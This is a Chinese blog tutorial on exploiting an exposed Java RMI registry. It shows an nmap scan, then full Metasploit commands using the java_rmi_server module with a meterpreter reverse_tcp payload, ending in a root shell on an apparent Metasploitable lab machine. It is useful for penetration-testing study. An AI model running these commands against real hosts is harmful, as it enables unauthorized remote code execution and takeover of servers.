Java RMI漏洞利用（1099/1090对外开放-rce）

最新推荐文章于 2024-03-28 09:46:08 发布

yggcwhat

最新推荐文章于 2024-03-28 09:46:08 发布

阅读量1.7k

点赞数 1

分类专栏： # 挖掘技巧 web漏洞挖掘文章标签： java web安全

本文链接：https://blog.csdn.net/weixin_57567655/article/details/128726530

版权

挖掘技巧同时被 2 个专栏收录

49 篇文章 15 订阅

订阅专栏

web漏洞挖掘

2 篇文章 0 订阅

订阅专栏

Java rmi介绍

Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制，能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。

RMI是J2SE的一部分，能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象，可以从另一个JAVA虚拟机上（甚至跨过网络）调用它的方法，可以像调用本地JAVA对象的方法一样调用远程对象的方法，使分布在不同的JVM中的对象的外表和行为都像本地对象一样。

对于任何一个以对象为参数的RMI接口，你都可以发一个自己构建的对象，迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。

RMI的传输100%基于反序列化。端口1099。

探测目标rmi

使用Nmap -p 1099 -sV IP地址探测目标的版本信息。

➜  ~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).

PORT     STATE SERVICE     VERSION
1099/tcp open  Java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

rmi远程命令执行利用方法一：

使用Metasploit 对 rmi RCE漏洞利用。

1、登录msfconsole

➜  ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.2-dev                           ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

2、使用exploit/multi/misc/java_rmi_server模块

msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5

3、设置payload

msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12

4、检查配置

msf5 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS     10.0.2.5         yes       The target address range or CIDR identifier
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

5、进行漏洞攻击

msf5 exploit(multi/misc/java_rmi_server) > run 

[*] Started reverse TCP handler on 10.0.2.12:4444 
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...

[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400

id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/misc/java_rmi_server) > sessions -l

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)

msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux